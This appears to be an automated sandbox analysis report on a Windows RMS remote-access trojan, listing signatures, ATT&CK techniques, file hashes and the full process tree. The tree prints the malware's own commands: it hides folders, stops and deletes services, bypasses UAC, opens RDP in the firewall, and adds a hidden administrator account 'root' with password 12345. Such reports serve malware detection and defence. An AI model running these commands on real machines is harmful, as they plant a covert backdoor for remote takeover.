Overview

overview

10

Static

static

3

b4d4530877...18.exe

windows7-x64

10

b4d4530877...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    21-08-2024 20:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b4d453087720b8fbf93147c039f4f8fb_JaffaCakes118.exe

  • Size

    6.6MB

  • MD5

    b4d453087720b8fbf93147c039f4f8fb

  • SHA1

    cfc9c30a92a61d0009bc4e21a1a808180d278218

  • SHA256

    42da9414a2faba94899ebaa84cd32841ac30db80d655c5be4d32ef568cc35014

  • SHA512

    1d498db675a631d91821786ef657d94814eadc8fc6062ad8256692bd5cf3e35632fce94e96d4672993b0fa36ed424cd7815d3ba81862ce0a75df4feebe9e9c51

  • SSDEEP

    98304:9Xz+/uvg6x/emUKoJV5ElkmPNJgpEdneZi+H02YqAQcmJ3Q/mUfBA9qcu1ccH6i1:FK21H5WV5ElzMpYXY0fBQcb7BA2hHf

Score
10/10
rmsdefense_evasiondiscoveryevasionexecutionpersistenceprivilege_escalationrattrojanupx

Malware Config

Signatures

  • RMS

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

    trojanratrms
  • UAC bypass 3 TTPs 2 IoCs
    evasiontrojan
  • Modifies Windows Firewall 2 TTPs 2 IoCs
    evasion
  • Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
    persistence
  • Sets file to hidden 1 TTPs 2 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

    evasion
  • Stops running service(s) 4 TTPs
    evasionexecution
  • Executes dropped EXE 20 IoCs
  • Loads dropped DLL 32 IoCs
  • UPX packed file 42 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Modifies WinLogon 2 TTPs 1 IoCs
    persistence
  • Hide Artifacts: Hidden Users 1 TTPs 1 IoCs
    defense_evasion
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

    discovery
  • System Location Discovery: System Language Discovery 1 TTPs 54 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Kills process with taskkill 2 IoCs
    evasion
  • Runs .reg file with regedit 2 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious behavior: LoadsDriver 5 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\b4d453087720b8fbf93147c039f4f8fb_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\b4d453087720b8fbf93147c039f4f8fb_JaffaCakes118.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2480
    • C:\ProgramData\CardWindows\WinDevInstall.exe
      "C:\ProgramData\CardWindows\WinDevInstall.exe" -p7832489354378589235643543456
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2320
      • C:\ProgramData\CardWindows\start1.exe
        "C:\ProgramData\CardWindows\start1.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2704
        • C:\ProgramData\CardWindows\start.exe
          "C:\ProgramData\CardWindows\start.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1672
          • C:\ProgramData\CardWindows\Builder.exe
            "C:\ProgramData\CardWindows\Builder.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:2596
          • C:\ProgramData\CardWindows\Builder2.exe
            "C:\ProgramData\CardWindows\Builder2.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:3056
          • C:\ProgramData\CardWindows\WinUpdate.exe
            "C:\ProgramData\CardWindows\WinUpdate.exe" -p5387687645378674524512345389721228
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1976
            • C:\ProgramData\CardWindows\WinUpdate1.exe
              "C:\ProgramData\CardWindows\WinUpdate1.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:2728
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ""C:\ProgramData\CardWindows\SysInstall.bat" "
                7⤵
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:3004
                • C:\Windows\SysWOW64\attrib.exe
                  attrib +s +h "C:\ProgramData\CardWindows"
                  8⤵
                  • Sets file to hidden
                  • System Location Discovery: System Language Discovery
                  • Views/modifies file attributes
                  PID:2204
                • C:\Windows\SysWOW64\sc.exe
                  sc stop RManService
                  8⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:2896
                • C:\Windows\SysWOW64\sc.exe
                  sc stop VDeviceCard
                  8⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:2856
                • C:\Windows\SysWOW64\sc.exe
                  sc stop NPackStereo
                  8⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:988
                • C:\Windows\SysWOW64\sc.exe
                  sc stop ServiceWork
                  8⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:2504
                • C:\Windows\SysWOW64\sc.exe
                  sc stop IntelDriver
                  8⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:1992
                • C:\Windows\SysWOW64\sc.exe
                  sc stop AMIHardware
                  8⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:1696
                • C:\Windows\SysWOW64\sc.exe
                  sc delete RManService
                  8⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:912
                • C:\Windows\SysWOW64\sc.exe
                  sc delete VDeviceCard
                  8⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:324
                • C:\Windows\SysWOW64\sc.exe
                  sc delete NPackStereo
                  8⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:2500
                • C:\Windows\SysWOW64\sc.exe
                  sc delete ServiceWork
                  8⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:2872
                • C:\Windows\SysWOW64\sc.exe
                  sc delete IntelDriver
                  8⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:928
                • C:\Windows\SysWOW64\sc.exe
                  sc delete AMIHardware
                  8⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:904
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /im rfusclient.exe /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1940
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /im rutserv.exe /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1156
                • C:\Windows\SysWOW64\reg.exe
                  reg delete "HKLM\SYSTEM\Nvidia\Toolbar\DeviceCard" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:564
                • C:\Windows\SysWOW64\regedit.exe
                  regedit /s "C:\ProgramData\CardWindows\config_set.reg"
                  8⤵
                  • UAC bypass
                  • System Location Discovery: System Language Discovery
                  • Runs .reg file with regedit
                  PID:704
                • C:\ProgramData\CardWindows\CDevice.exe
                  "C:\ProgramData\CardWindows\CDevice.exe" /silentinstall
                  8⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  PID:1012
                • C:\ProgramData\CardWindows\CDevice.exe
                  "C:\ProgramData\CardWindows\CDevice.exe" /firewall
                  8⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of SetWindowsHookEx
                  PID:2476
                • C:\Windows\SysWOW64\regedit.exe
                  regedit /s "C:\ProgramData\CardWindows\config_set.reg"
                  8⤵
                  • UAC bypass
                  • System Location Discovery: System Language Discovery
                  • Runs .reg file with regedit
                  PID:1648
                • C:\Windows\SysWOW64\sc.exe
                  sc failure VDeviceCard reset= 0 actions= restart/500/restart/500/restart/500
                  8⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:2240
                • C:\Windows\SysWOW64\sc.exe
                  sc config VDeviceCard obj= LocalSystem type= interact type= own
                  8⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:2656
                • C:\ProgramData\CardWindows\CDevice.exe
                  "C:\ProgramData\CardWindows\CDevice.exe" /start
                  8⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  PID:2768
                • C:\Windows\SysWOW64\attrib.exe
                  attrib +s +h "C:\ProgramData\CardWindows\*.*"
                  8⤵
                  • Sets file to hidden
                  • System Location Discovery: System Language Discovery
                  • Views/modifies file attributes
                  PID:2252
          • C:\ProgramData\CardWindows\RDP.exe
            "C:\ProgramData\CardWindows\RDP.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1636
            • C:\ProgramData\RDP\RDPWrapper_run.exe
              "C:\ProgramData\RDP\RDPWrapper_run.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2392
              • C:\ProgramData\RDP\RDPWrapper.exe
                "C:\ProgramData\RDP\RDPWrapper.exe" -p27852786784527827414245258638727424524124452741245527212
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:2244
                • C:\ProgramData\RDP\run.exe
                  "C:\ProgramData\RDP\run.exe"
                  8⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:1420
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c ""C:\ProgramData\RDP\run.bat" "
                    9⤵
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:1804
                    • C:\Windows\SysWOW64\reg.exe
                      reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
                      10⤵
                      • System Location Discovery: System Language Discovery
                      PID:2368
                    • C:\Windows\SysWOW64\reg.exe
                      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
                      10⤵
                      • System Location Discovery: System Language Discovery
                      PID:2912
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
                      10⤵
                      • Modifies Windows Firewall
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:980
                    • C:\Windows\SysWOW64\net.exe
                      net user root /add
                      10⤵
                      • System Location Discovery: System Language Discovery
                      PID:1980
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 user root /add
                        11⤵
                        • System Location Discovery: System Language Discovery
                        PID:1628
                    • C:\Windows\SysWOW64\net.exe
                      net localgroup Çñ¼¿¡¿ßΓαáΓ«αδ root /add
                      10⤵
                      • System Location Discovery: System Language Discovery
                      PID:2864
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 localgroup Çñ¼¿¡¿ßΓαáΓ«αδ root /add
                        11⤵
                        • System Location Discovery: System Language Discovery
                        PID:1640
                    • C:\Windows\SysWOW64\net.exe
                      net user root 12345
                      10⤵
                      • System Location Discovery: System Language Discovery
                      PID:2980
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 user root 12345
                        11⤵
                        • System Location Discovery: System Language Discovery
                        PID:836
                    • C:\Windows\SysWOW64\reg.exe
                      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v root /t REG_DWORD /d 0 /f
                      10⤵
                      • Hide Artifacts: Hidden Users
                      • System Location Discovery: System Language Discovery
                      PID:1632
                    • C:\ProgramData\RDP\RDPWInst.exe
                      "C:\ProgramData\RDP\RDPWInst.exe" -i -o
                      10⤵
                      • Server Software Component: Terminal Services DLL
                      • Executes dropped EXE
                      • Modifies WinLogon
                      • Drops file in Program Files directory
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1608
                      • C:\Windows\system32\netsh.exe
                        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                        11⤵
                        • Modifies Windows Firewall
                        • Event Triggered Execution: Netsh Helper DLL
                        PID:2808
                    • C:\ProgramData\RDP\RDPWInst.exe
                      "C:\ProgramData\RDP\RDPWInst.exe" -w
                      10⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:2872
  • C:\ProgramData\CardWindows\CDevice.exe
    C:\ProgramData\CardWindows\CDevice.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    PID:2320
    • C:\ProgramData\CardWindows\sysdevices.exe
      C:\ProgramData\CardWindows\sysdevices.exe /tray
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1168
    • C:\ProgramData\CardWindows\sysdevices.exe
      C:\ProgramData\CardWindows\sysdevices.exe
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      PID:2936
      • C:\ProgramData\CardWindows\sysdevices.exe
        C:\ProgramData\CardWindows\sysdevices.exe /tray
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: SetClipboardViewer
        PID:3008

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

System Services

1
T1569

Service Execution

1
T1569.002

Persistence

Boot or Logon Autostart Execution

1
T1547

Winlogon Helper DLL

1
T1547.004

Create or Modify System Process

2
T1543

Windows Service

2
T1543.003

Event Triggered Execution

1
T1546

Netsh Helper DLL

1
T1546.007

Server Software Component

1
T1505

Terminal Services DLL

1
T1505.005

Privilege Escalation

Abuse Elevation Control Mechanism

1
T1548

Bypass User Account Control

1
T1548.002

Boot or Logon Autostart Execution

1
T1547

Winlogon Helper DLL

1
T1547.004

Create or Modify System Process

2
T1543

Windows Service

2
T1543.003

Event Triggered Execution

1
T1546

Netsh Helper DLL

1
T1546.007

Defense Evasion

Abuse Elevation Control Mechanism

1
T1548

Bypass User Account Control

1
T1548.002

Hide Artifacts

3
T1564

Hidden Files and Directories

2
T1564.001

Hidden Users

1
T1564.002

Impair Defenses

3
T1562

Disable or Modify System Firewall

1
T1562.004

Disable or Modify Tools

1
T1562.001

Modify Registry

2
T1112

Credential Access

Discovery

Permission Groups Discovery

1
T1069

Local Groups

1
T1069.001

Query Registry

1
T1012

System Information Discovery

1
T1082

System Location Discovery

1
T1614

System Language Discovery

1
T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1
T1102

Exfiltration

Impact

Service Stop

1
T1489

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\CardWindows\Builder2.exe
    Filesize

    154KB

    MD5

    2f9404a1546b74fa36fd3f29e026240c

    SHA1

    e52498e70014a1411dd824faa6ac242a8174e8d5

    SHA256

    8c3380b859808f262b3b2b50784a6df4787a494def2798f04551df76bf54db5c

    SHA512

    a0000a04a2bc05e5d4472ae03dea797a1a666965eccbfa2db3a96b199c1ccc1071f8104398ae6ad57a39e97b163e07171e587ee1e5203b40646ab2d8e3641106

    Download Submit

  • C:\ProgramData\CardWindows\CDevice.exe
    Filesize

    1.8MB

    MD5

    d72d6920de3d805ae296d1eb546fda02

    SHA1

    cc64201ba895902ef597d232138838c80c5d88d1

    SHA256

    ace233bd79a1bed3cb78bc0036690583bf1a81b177299ed02c503fac4c3e9cdd

    SHA512

    b8bf5ceb62f376f9ae443159cbdad6d01b213031e2ffc220649153e8a8ec2524dc28f829012b58f049a3eccdeba7860d89910daa0fb608ee71f416f2dcf07d39

    Download Submit

  • C:\ProgramData\CardWindows\Russian.lg
    Filesize

    48KB

    MD5

    e44e34bc285b709f08f967325d9c8be1

    SHA1

    e73f05c6a980ec9d006930c5343955f89579b409

    SHA256

    1d99a7b5f7b3daa61fa773972b1e335aa09b92411484f6ddc99d2b2894455a5b

    SHA512

    576b292b6e9cf022822443e050994462a6cbd9a3c60063bae9f54c78a84e75e17bb5eddf7e259a22a9d93f757cb6536c503762e2a30e75091e40c2756cde8727

    Download Submit

  • C:\ProgramData\CardWindows\SysInstall.bat
    Filesize

    1KB

    MD5

    a00d1b7d978dcd3728e14c3f0e2386df

    SHA1

    596deee85bd6521c9d3fb7ffe3654aa0b386e9ed

    SHA256

    00baf3f49d72d9ae56cd5dbfbcd0a3a87b88ae3e768cbfe8a77769fd443a1cd5

    SHA512

    fe8a3752ba3bfddeb979f0a3cb8787218525057b873481f24169c6629851f862059ceb1cc52ed03f6b1bea87866833a107226b6a1a5ab969b959de0d56987c80

    Download Submit

  • C:\ProgramData\CardWindows\WinDevInstall.exe
    Filesize

    6.4MB

    MD5

    33f6a4ac5579f90e922133688e63aec5

    SHA1

    d4be64a1d028942b41565ef11b4fc89e29ec29c2

    SHA256

    52d404ea9e55ca686af6fc07cefd56e8f83a728109145d92842782999505f38a

    SHA512

    f711b4d5bcac8f9a377dd036834f8146a75021d236405e38e4369c912bb377d011790795e18044267e1f7eb2daa807bff35298dfddcab164e8086644bbdd9f65

    Download Submit

  • C:\ProgramData\CardWindows\WinUpdate.exe
    Filesize

    4.2MB

    MD5

    06453777004fb5230908f0e685994b82

    SHA1

    84febca11f852a8743f43cc0e6800b9a42837c4a

    SHA256

    7711ff56bc0b3d0b7699a6bf55cdb82bc99075375ec3ba0054974508f232faf6

    SHA512

    93fcd9aa358b6473e1a7c3fa791b150eaf05dd5270bb09844c0cbcf7a058ba2dcd6c71664b637df222bd9c087b1fd10ad19fcf081fc3437fe74c2d78646e7579

    Download Submit

  • C:\ProgramData\CardWindows\config_set.reg
    Filesize

    12KB

    MD5

    7335428a17c58c550a3cac2e1e60fdfb

    SHA1

    62e6f6d3917660ca320ae78e0d9893c41592417d

    SHA256

    2f2c82b0a2ca9b358ead399799620fac240bdb2eca8fdc4f5a79c85daecd88c9

    SHA512

    5013623fe1691d45ebb073b76db2c00a396961b201efb4c840c8984e2613b77204c061a6add1a0e5f7741cbd8078c7ec4dfb9f1a028abef94c38ea21ac5ade05

    Download Submit

  • C:\ProgramData\CardWindows\vp8decoder.dll
    Filesize

    378KB

    MD5

    d43fa82fab5337ce20ad14650085c5d9

    SHA1

    678aa092075ff65b6815ffc2d8fdc23af8425981

    SHA256

    c022958429edd94bfe31f2eacfe24ff6b45d6f12747725c449a36116373de03b

    SHA512

    103e61a9f58df03316676a074487e50ec518479c11068df3736df139b85c7671048c65bce0ef2c55b3c50c61fde54e9e6c7d1b795aea71263ae94c91d4874e0d

    Download Submit

  • C:\ProgramData\RDP\RDPWInst.exe
    Filesize

    1.3MB

    MD5

    9c257b1d15817a818a675749f0429130

    SHA1

    234d14da613c1420ea17de60ab8c3621d1599f6f

    SHA256

    b92962c2b4794ee418f0248743131d472a10ac96e520dda2afddf8ca3f3cd64c

    SHA512

    b63fb6ba7b622f95fc151ca62c339368991c3c4c22e4bbe2305ac7172ee3f10e5049850e87cf3b87a13f4f15c516fbd20cadde9197064b659ffc66599e71d521

    Download Submit

  • C:\ProgramData\RDP\RDPWrapper.exe
    Filesize

    1.6MB

    MD5

    e4814efdb3d6761683665c487a02ef2b

    SHA1

    ecd25ee74af98658000e36b90c58af628b6ab6b8

    SHA256

    5f4aa202be2bb72123a8aac89322e00bf8d8daf027d510bb368df3dd093a7e23

    SHA512

    982558f59250bc213de5f27e7aac5fa5975e0ab9c979d23e4836b0a493c598d1d804c42d5a9faa1214892b4b1c2c6733be44a00966f65bdbb62946198d08d0e5

    Download Submit

  • C:\ProgramData\RDP\RDPWrapper_run.exe
    Filesize

    368KB

    MD5

    35862d6de7d5f5a21a111f4e9c831839

    SHA1

    891e59e3a6798ac60ef333cdfb7969ef02a3e77c

    SHA256

    5f701eb1a3d0aeea8242431cf44b6ceccb364c2f430b8577bcfa4e6a3fca7b55

    SHA512

    00868a01af48be7d2c5c619891c77620e616ac05969c2c3dd146f551976b59be476ce6cbbaf87888aa14d5de2aa498a469440f0085f1ae063e7681e7a44cef56

    Download Submit

  • C:\ProgramData\RDP\run.bat
    Filesize

    612B

    MD5

    4e6a1033e3c2f39db397d392fe0d7c77

    SHA1

    11526234cd216334902d51665529c2b9be7acc05

    SHA256

    2eb8001ce06e7b2764fb7b4e637d53583e365640e72a3d53e1d3b4790ae306d4

    SHA512

    395293d8ecd67f4c32702b11fdf0761f9e283346274ee1e4c4a3f47672fc683be4917fd87da2fde4e3d7e986e3884799329f9f28082e89f75aa17ca38c46dceb

    Download Submit

  • C:\ProgramData\RDP\run.exe
    Filesize

    368KB

    MD5

    c4f61801834172c1f1973e8791311340

    SHA1

    de48c219435feda6680c474b445c8f548441abc7

    SHA256

    c396dcc91a1fe215773eef9435d35734d76e7324ba1a40b46fa15f43acb3488d

    SHA512

    8fc16d1375f20a531593873aac252f0394315004bc51e55e14c0e93f2ea76272a6965da30228a7f16e01e1e42a49ec759afd46c6b914154c766c1a8d39b2a0b7

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\$inst\2.tmp
    Filesize

    36B

    MD5

    8708699d2c73bed30a0a08d80f96d6d7

    SHA1

    684cb9d317146553e8c5269c8afb1539565f4f78

    SHA256

    a32e0a83001d2c5d41649063217923dac167809cab50ec5784078e41c9ec0f0f

    SHA512

    38ece3e441cc5d8e97781801d5b19bdede6065a0a50f7f87337039edeeb4a22ad0348e9f5b5542b26236037dd35d0563f62d7f4c4f991c51020552cfae03b264

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Cab345B.tmp
    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Tar348D.tmp
    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    Download Submit

  • \??\PIPE\samr
    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

    Download Submit

  • \ProgramData\CardWindows\RDP.exe
    Filesize

    1.8MB

    MD5

    06500c519e9a20c6851d55e4ec6a1bff

    SHA1

    d09baa50160cd02e31f3f617ea24e1f655dd67cb

    SHA256

    3a427942a462adc64695f62480b63470edef3e46599442e6fb517397967475d0

    SHA512

    217ff7685d97c6563a57497620cfa33e21683ec963c69b77054d04a339ffddd198e0835e73f2cce1606ce860f91feb1463ced22b392049d1b693e471d30bcec8

    Download Submit

  • \ProgramData\CardWindows\WinUpdate1.exe
    Filesize

    158KB

    MD5

    a87f9f2ec81f6e06092bc89c52953b32

    SHA1

    c6b44dc646f26b6c896eb528d5caee0fd2a24061

    SHA256

    8696215c45e4c49aab4c819181efb2201216dadadcb764572a3f1ecbcd3a41ed

    SHA512

    b77fee6c4b45d9383d2989b82edd1b2d2a218bf48013339d91738a244b2ee4d9ac468c70d1b558252324d43d6bd51955da859531a3cbc9e3f3b5eda9a46fcbbd

    Download Submit

  • \ProgramData\CardWindows\start.exe
    Filesize

    154KB

    MD5

    dc9f7f087a52cccbfca60aa59f389f9e

    SHA1

    4a747d3ebf91d11cf1cb282b23cdf5e6cfbdc283

    SHA256

    53858e39610891bae32f60ecee885de73eba50da6d5e1b9160ca6134e408fc03

    SHA512

    777180c3e5e0c723413ba6e6064fdad9dc7ceb8fc8653a46f33683c8e0eae531d0a5d86528e6562cf9218919fcfc2ea842e0f41a8fd910400fd6e480588985f1

    Download Submit

  • \ProgramData\CardWindows\start1.exe
    Filesize

    154KB

    MD5

    d56be8efb222e9a40fe8e5486ac1c624

    SHA1

    53285b987182fb6b94bd41ad4c639336a4ff80cb

    SHA256

    df650b6ffa69ca42452c17e9dc7a82bf7cf3eea96cdb7c64329bbb68eb2fb88b

    SHA512

    904ef0ea1f3ea9aad9dfbffd79c4883852bb74494f9271bb5e19ee6b8fb8370ba3b01e8942aec5892b9855dddd40badd5e553324764c3ae19c229ad123d28f71

    Download Submit

  • memory/1012-179-0x0000000000400000-0x0000000000AB2000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/1012-175-0x0000000000400000-0x0000000000AB2000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/1168-324-0x0000000000400000-0x00000000009B4000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/1168-314-0x0000000000400000-0x00000000009B4000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/1168-320-0x0000000000400000-0x00000000009B4000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/1168-331-0x0000000000400000-0x00000000009B4000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/1168-221-0x0000000000400000-0x00000000009B4000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/1168-338-0x0000000000400000-0x00000000009B4000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/1420-167-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

    Download

  • memory/1608-257-0x0000000000400000-0x0000000000553000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/1636-99-0x0000000000400000-0x0000000000433000-memory.dmp

    Filesize

    204KB

    Download

  • memory/1672-80-0x0000000000400000-0x0000000000467000-memory.dmp

    Filesize

    412KB

    Download

  • memory/1672-62-0x00000000022B0000-0x0000000002317000-memory.dmp

    Filesize

    412KB

    Download

  • memory/1672-60-0x0000000000720000-0x0000000000730000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1976-125-0x0000000003B70000-0x0000000003BDA000-memory.dmp

    Filesize

    424KB

    Download

  • memory/2320-202-0x0000000005060000-0x0000000005614000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2320-315-0x0000000000400000-0x0000000000AB2000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/2320-212-0x0000000005060000-0x0000000005614000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2320-347-0x0000000000400000-0x0000000000AB2000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/2320-197-0x0000000000400000-0x0000000000AB2000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/2320-344-0x0000000000400000-0x0000000000AB2000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/2320-312-0x0000000005060000-0x0000000005614000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2320-330-0x0000000000400000-0x0000000000AB2000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/2320-313-0x0000000005060000-0x0000000005614000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2320-323-0x0000000000400000-0x0000000000AB2000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/2320-46-0x0000000003990000-0x00000000039F7000-memory.dmp

    Filesize

    412KB

    Download

  • memory/2320-337-0x0000000000400000-0x0000000000AB2000-memory.dmp

    Filesize

    6.7MB

    Download

